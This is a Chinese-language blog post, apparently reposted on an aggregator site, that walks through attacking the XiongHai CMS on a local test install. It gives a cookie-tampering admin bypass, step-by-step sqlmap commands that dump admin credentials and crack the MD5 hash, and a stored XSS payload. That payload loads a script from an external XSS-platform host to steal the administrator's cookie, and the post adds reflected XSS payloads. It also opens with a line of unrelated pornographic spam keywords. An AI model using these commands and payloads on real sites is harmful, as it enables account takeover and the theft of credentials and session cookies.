国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

這篇具有很好參考價值的文章主要介紹了熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

CMS下載地址:https://www.jb51.net/codes/303119.html

代碼審計(jì),篡改cookie登錄管理員界面

  1. 通過信息搜集找到了網(wǎng)站的源碼

熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

this.location='?r=index,發(fā)現(xiàn)登錄后臺的URL

  1. 查看源碼中登錄驗(yàn)證的代碼

熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

分析:如果cookie中use為空,還是跳回到登錄界面,所以user不為空,則跳過驗(yàn)證,實(shí)現(xiàn)cookie的篡改

熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

通過修改url地址,burp抓包修改cookie

熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

成功登錄到管理員的后臺

一、SQL注入獲取管理員賬號密碼

1. 點(diǎn)開一篇文章,存在get請求參數(shù)

?熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

2. 手工注入無果,使用sqlmap,后跟-p接指定參數(shù),驗(yàn)證是否存在sql注入

sqlmap.py -u " http://127.0.0.1/xhcms/?r=content&cid=5" -p "cid"

?熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

3. 爆數(shù)據(jù)庫

sqlmap.py -u " http://127.0.0.1/xhcms/?r=content&cid=5" -p "cid" --dbs

?熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

4. 爆表

sqlmap.py -u " http://127.0.0.1/xhcms/?r=content&cid=5" -p "cid" -D xhcms --tables

?熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

5. 爆字段

sqlmap.py -u "http://127.0.0.1/xhcms/?r=content&cid=5" -p "cid" -D xhcms -T manage --columns

?熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

6. 爆值

sqlmap.py -u " http://127.0.0.1/xhcms/?r=content&cid=5" -p "cid" -D xhcms -T manage -C user,password --dump

?熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

7. MD5解密202cb962ac59075b964b07152d234b70 ?為 ?123

得到管理員的賬號密碼 admin /123

可以進(jìn)一步登進(jìn)后臺操作


二、存儲型XSS獲取管理員cookie

1. 在xss平臺上配置監(jiān)聽端口

?熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

?熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

2. 復(fù)制代碼,<sCRiPt sRC=http://xss.fbisb.com/tHbs></sCrIpT>

?熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

3. 在表單中插入xss腳本

?熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

4. 發(fā)表成功,等待管理員登錄后臺查看留言,

?熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

?熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

5. 監(jiān)聽段得到服務(wù)端反彈過來的信息,得到管理員的cookie

?熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

6. 找到網(wǎng)站后臺,登錄抓包

?熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

把cookie替換陳管理員的cookie,并且記得要換上面的目標(biāo)網(wǎng)址把login.php換成index.php,需要改多個包,發(fā)包進(jìn)入后臺

?熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改


三、反彈型xss

http://192.168.31.68/?r=content&cid=5' <img src=1 οnerrοr=alert(/xss/)>

熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改

http://192.168.31.68/?r=list&class=3&page=1'<img src=1 οnerrοr=alert(/xss/)>

?熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改文章來源地址http://www.zghlxwxcb.cn/news/detail-500736.html

到了這里,關(guān)于熊海CMS網(wǎng)站SQL注入、XSS攻擊、cookie篡改的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 網(wǎng)站代碼sql注入攻擊漏洞修復(fù)加固防護(hù)措施

    網(wǎng)站代碼sql注入攻擊漏洞修復(fù)加固防護(hù)措施

    什么是SQL注入攻擊? SQL注入是一種網(wǎng)站的攻擊方法。它將SQL代碼添加到網(wǎng)站前端GET POST參數(shù)中,并將其傳遞給mysql數(shù)據(jù)庫進(jìn)行分析和執(zhí)行語句攻擊。 如何生成SQL注入漏洞的? 1。網(wǎng)站程序員以及運(yùn)維技術(shù)是不能保證所有的前端輸入都被安全效驗(yàn)與攔截過濾。 2。攻擊者使用發(fā)送

    2024年02月01日
    瀏覽(24)
  • 【Node.js實(shí)戰(zhàn)】一文帶你開發(fā)博客項(xiàng)目之安全(sql注入、xss攻擊、md5加密算法)

    【Node.js實(shí)戰(zhàn)】一文帶你開發(fā)博客項(xiàng)目之安全(sql注入、xss攻擊、md5加密算法)

    個人簡介 ?? 個人主頁: 前端雜貨鋪 ???♂? 學(xué)習(xí)方向: 主攻前端方向,也會涉及到服務(wù)端 ?? 個人狀態(tài): 在校大學(xué)生一枚,已拿多個前端 offer(秋招) ?? 未來打算: 為中國的工業(yè)軟件事業(yè)效力n年 ?? 推薦學(xué)習(xí):??前端面試寶典 ??Vue2 ??Vue3 ??Vue2Vue3項(xiàng)目實(shí)戰(zhàn) ??

    2024年02月03日
    瀏覽(26)
  • SpringCloud微服務(wù)實(shí)戰(zhàn)——搭建企業(yè)級開發(fā)框架:微服務(wù)安全加固—自定義Gateway攔截器實(shí)現(xiàn)防止SQL注入/XSS攻擊

    ?SQL注入是常見的系統(tǒng)安全問題之一,用戶通過特定方式向系統(tǒng)發(fā)送SQL腳本,可直接自定義操作系統(tǒng)數(shù)據(jù)庫,如果系統(tǒng)沒有對SQL注入進(jìn)行攔截,那么用戶甚至可以直接對數(shù)據(jù)庫進(jìn)行增刪改查等操作。 ??XSS全稱為Cross Site Script跨站點(diǎn)腳本攻擊,和SQL注入類似,都是通過特定方

    2024年02月03日
    瀏覽(25)
  • XSS攻擊(1), 測試XSS漏洞, 獲取cookie

    一, 概念: XSS(Cross-Site Scripting), 跨站攻擊腳本, XSS漏洞發(fā)生在前端, 依賴于瀏覽器的解析引擎, 讓前端執(zhí)行攻擊代碼. XSS其實(shí)也算注入類的攻擊, XSS代碼注入需要有JavaScript編程基礎(chǔ). 二, 目的: XSS(跨站腳本)攻擊的目的多種多樣,攻擊者可以利用這種漏洞實(shí)施各種惡意行為。以下

    2024年02月07日
    瀏覽(22)
  • XSS注入(跨站腳本攻擊)

    XSS注入(跨站腳本攻擊)

    今天學(xué)習(xí)一下xss注入 XSS注入漏洞又稱為\\\"跨站腳本攻擊(Cross Site Scripting)\\\",為了不和層疊樣式表(Cascading Style Sheets,CSS)混淆,所以將跨站腳本攻擊縮寫為XSS。xss本質(zhì)上是黑客通過對網(wǎng)頁的HTML注入,篡改了原本服務(wù)器發(fā)給客戶端的數(shù)據(jù)包,在其中插入了惡意的Script代碼插入到網(wǎng)頁

    2024年02月09日
    瀏覽(28)
  • 熊海cms滲透測試

    熊海cms滲透測試

    首先,先進(jìn)行代碼審計(jì),丟進(jìn)seay源代碼審計(jì)系統(tǒng)自動審計(jì),然后接著一個個手動分析代碼 1.文件包含 /index.php 和admin/index.php代碼如下 分析代碼,接收傳進(jìn)來的參數(shù)r,進(jìn)行addslashes過濾( 在每個雙引號(\\\")前添加反斜杠: ),然后進(jìn)行判斷,再進(jìn)行文件包含,則這里是個文件

    2024年02月11日
    瀏覽(12)
  • [網(wǎng)絡(luò)安全]XSS之Cookie外帶攻擊姿勢及例題詳析(基于DVWA靶場)

    [網(wǎng)絡(luò)安全]XSS之Cookie外帶攻擊姿勢及例題詳析(基于DVWA靶場)

    本文僅分享XSS攻擊知識,不承擔(dān)任何法律責(zé)任。 本文涉及的軟件等請讀者自行安裝,本文不再贅述。 XSS 的 Cookie 外帶攻擊就是一種針對 Web 應(yīng)用程序中的 XSS(跨站腳本攻擊)漏洞進(jìn)行的攻擊,攻擊者通過在 XSS 攻擊中注入惡意腳本,從而 竊取用戶的 Cookie 信息 。 在使用XSS語

    2024年02月08日
    瀏覽(23)
  • 21Dak攻擊:計(jì)算機(jī)頂會PLDI‘23 針對語義依附代碼模型的對抗攻擊方法:Destroyer篡改輸入程序,F(xiàn)inder尋找關(guān)鍵特征,Merger關(guān)鍵特征注入【網(wǎng)安AIGC專題11.22】

    21Dak攻擊:計(jì)算機(jī)頂會PLDI‘23 針對語義依附代碼模型的對抗攻擊方法:Destroyer篡改輸入程序,F(xiàn)inder尋找關(guān)鍵特征,Merger關(guān)鍵特征注入【網(wǎng)安AIGC專題11.22】

    本文為鄒德清教授的《網(wǎng)絡(luò)安全專題》課堂筆記系列的文章,本次專題主題為大模型。 陳蘇寧同學(xué)分享了Discrete Adversarial Attack to Models of Code《對代碼模型的離散對抗性攻擊》 PPT很清爽接受起來比較順暢 論文發(fā)布在:PLDI 2023(Programming Language Design and Implementation)計(jì)算機(jī)科學(xué)領(lǐng)

    2024年01月16日
    瀏覽(22)
  • 友點(diǎn)CMS GetSpecial SQL注入漏洞復(fù)現(xiàn)

    友點(diǎn)CMS GetSpecial SQL注入漏洞復(fù)現(xiàn)

    友點(diǎn)CMS是一款高效且靈活的網(wǎng)站管理系統(tǒng),它為用戶提供了簡單易用的界面和豐富的功能。無論是企業(yè)還是個人,都能通過友點(diǎn)CMS快速搭建出專業(yè)且美觀的網(wǎng)站。該系統(tǒng)支持多種內(nèi)容類型和自定義模板,方便用戶按需調(diào)整。同時,它具備強(qiáng)大的SEO功能,能提升網(wǎng)站在搜索引擎

    2024年02月20日
    瀏覽(86)
  • 什么是SQL注入攻擊,解釋如何防范SQL注入攻擊?

    SQL注入攻擊是一種常見的網(wǎng)絡(luò)攻擊方式,攻擊者通過在Web應(yīng)用程序的查詢語句中插入惡意代碼,從而獲取數(shù)據(jù)庫中的敏感信息或者執(zhí)行其他惡意操作。 為了防范SQL注入攻擊,可以采取以下措施: 使用參數(shù)化查詢:使用參數(shù)化查詢可以避免攻擊者通過查詢語句中的參數(shù)注入惡

    2024年02月10日
    瀏覽(22)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包